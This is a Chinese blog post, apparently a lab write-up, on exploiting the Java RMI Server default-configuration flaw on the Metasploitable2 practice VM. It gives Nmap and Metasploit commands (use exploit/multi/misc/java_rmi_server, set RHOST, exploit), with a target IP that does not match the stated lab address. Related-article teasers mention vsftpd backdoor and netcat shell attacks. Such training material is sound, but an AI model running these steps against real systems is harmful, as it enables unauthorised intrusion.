Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞

最新推荐文章于 2024-05-15 13:16:02 发布
最新推荐文章于 2024-05-15 13:16:02 发布
阅读量1.4k 收藏 8
点赞数 3
分类专栏: Metasploit使用详解 文章标签: Java RMI 漏洞利用 代码执行 Metasploit 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41901122/article/details/115408986
版权
本文详细介绍了如何利用Java Remote Method Invocation (RMI) 服务的默认配置漏洞进行攻击。首先,通过Nmap扫描确认目标主机1099端口是否开放。接着,在Metasploit框架中选择相应的RMI漏洞库,并设置攻击参数,如目标IP。最后,执行攻击并成功利用漏洞,展示了黑客可能的渗透路径。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

环境

主机地址
Metasploitable2192.168.232.202
kali-linux192.168.232.129

原理

  • Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

漏洞利用

第一步 ,查看1099端口是否开启
Nmap –p 0-65535 192.168.232.202

在这里插入图片描述

第二步选择漏洞库
msfconsole
search rmi
use exploit/multi/misc/java_rmi_server

在这里插入图片描述

第三步 设置参数,开始攻击
show options
Set RHOST 192.168.160.131 设置要攻击的IP
exploit

在这里插入图片描述

第四步 利用成功,

在这里插入图片描述

摘抄

帆起远航,不惧风浪,

心之所向,势不可挡

Java RMI SERVER命令执行漏洞
m0_62670778的博客
05-12 893
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。
Metasploitable2靶机渗透linux系统实操
最新发布
以自己喜欢的方式过一生
11-07 1531
Metasploitable2靶机渗透linux系统实操
Metasploit溢出java RMI SERVER命令执行漏洞
weixin_33924312的博客
12-10 1155
利用java RMI SERVER命令执行漏洞,获得目标主机root权限。Java RMI ServerRMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168...
Java-RMI漏洞利用
2301_76175665的博客
06-16 1902
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
Java RMI 远程代码执行漏洞
LuckySec
11-30 3737
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
Java RMI 反序列化漏洞-远程命令执行
tangshuangsss的专栏
12-22 3112
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介RMI即远程方法调用,通俗的来说就是客户端可以调用服务端的方法。和RPC差不多,RMIjava独立实现的...
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1316
漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
JAVA-rmi漏洞复现详细过程
weixin_69925635的博客
07-19 722
使用kali linux对metasploittable虚拟机的java-rmi漏洞复现的详细流程
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1165
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击
RMI远程方法实现
11-07
RMI远程方法的实现,客户端调用未添加
Java RMI服务远程命令执行利用
wjy397的专栏
10-10 1576
http://www.myhack58.com/Article/html/3/62/2016/71978.htm Java RMI服务是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。 在Java Web中,很多地方都会用到RMI来相互调用。比如很多大型组织都会在后台部署一些Java应用
MSF基于JAVA漏洞获取shell实战
永远是少年
06-13 818
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
Java rmi漏洞利用及原理记录
weixin_30564901的博客
08-15 1325
CVE-2011-3556 该模块利用了RMI的默认配置。注册表和RMI激活服务,允许加载类来自任何远程(HTTP)URL。当它在RMI中调用一个方法时分布式垃圾收集器,可通过每个RMI使用endpoint,它可以用于rmiregist和rmid,以及对大多 漏洞利用: 漏洞常用端口1099 msf5 > use exploit/multi/misc/java_rmi...
网络安全基础篇:入门渗透测试(1)
qq_44689964的博客
05-15 1879
root shell 是以用户“root”运行的 shell(命令行终端),“root”是 Linux 机器中具有最高权限的帐户。获取目标IP地址后,我们需要进行服务发现。这是一个侦察阶段,我们发现目标提供什么样的服务(及其版本),并可能在这个早期阶段发现简单的漏洞。“nc”或“netcat”程序允许我们发起与目标IP和端口的直接TCP连接,这足以让我们获得root shell并获得对目标机器的完全控制。渗透测试的主要目标之一是发现目标计算机上的漏洞,这有助于通过修补发现的易受攻击的服务来保护目标系统。
Java RMI漏洞利用(1099/1090对外开放-rce)
yggcwhat
01-18 2765
Java RMI漏洞利用(1099/1090对外开放-rce)
漏洞分析】远程命令执行漏洞总结
程序员阿飘 的博客
01-06 946
fastjson.jar包原始下载地址:github.com/alibaba/fas…fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 3万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
利用1099服务漏洞————java_rmi_server
weixin_43196087的博客
10-22 4131
本文章是小白up主的自我笔记,希望对正在 学习的你有所帮助 在BT5上利用漏洞机端口1099服务漏洞进行攻击查看根目录下的文件 今天我们来利用1099的服务漏洞来进行攻击 首先我么要用到的虚拟机有: BT5,和linux的漏洞机 其实一般这些利用模块的攻击模块都是在msfconsole模式下进行的,他们的流程都是差不多的 我们先进行1099的端口服务的扫描,看一下1099具体的服务名称 nma...
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
Nmap是一款强大的网络发现和安全审计工具,可以用来扫描目标主机的端口和服务,以确定其漏洞和安全风险。 以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: 1. 确定目标主机的IP地址。可以使用ping命令或其他工具来确定目标主机的IP地址。 2. 打开终端,输入以下命令扫描Metasploitable2-XP主机的开放端口: ``` nmap -p- 192.168.1.101 ``` 该命令将扫描目标主机的所有端口,并显示开放的端口和对应的服务。 3. 打开终端,输入以下命令扫描Metasploitable2-Linux主机的开放端口: ``` nmap -sS -p 1-65535 192.168.1.102 ``` 该命令将使用TCP SYN扫描模式扫描目标主机的所有端口,并显示开放的端口和对应的服务。 注意:在扫描Linux主机时,需要使用sudo权限来执行该命令。 4. 分析扫描结果,确定可能存在的漏洞和安全风险,并采取相应的措施加强主机的安全防护。 总之,使用Nmap工具可以帮助我们快速发现目标主机的端口和服务,从而评估主机的安全风险,并采取措施加强主机的安全防护。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星球守护者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值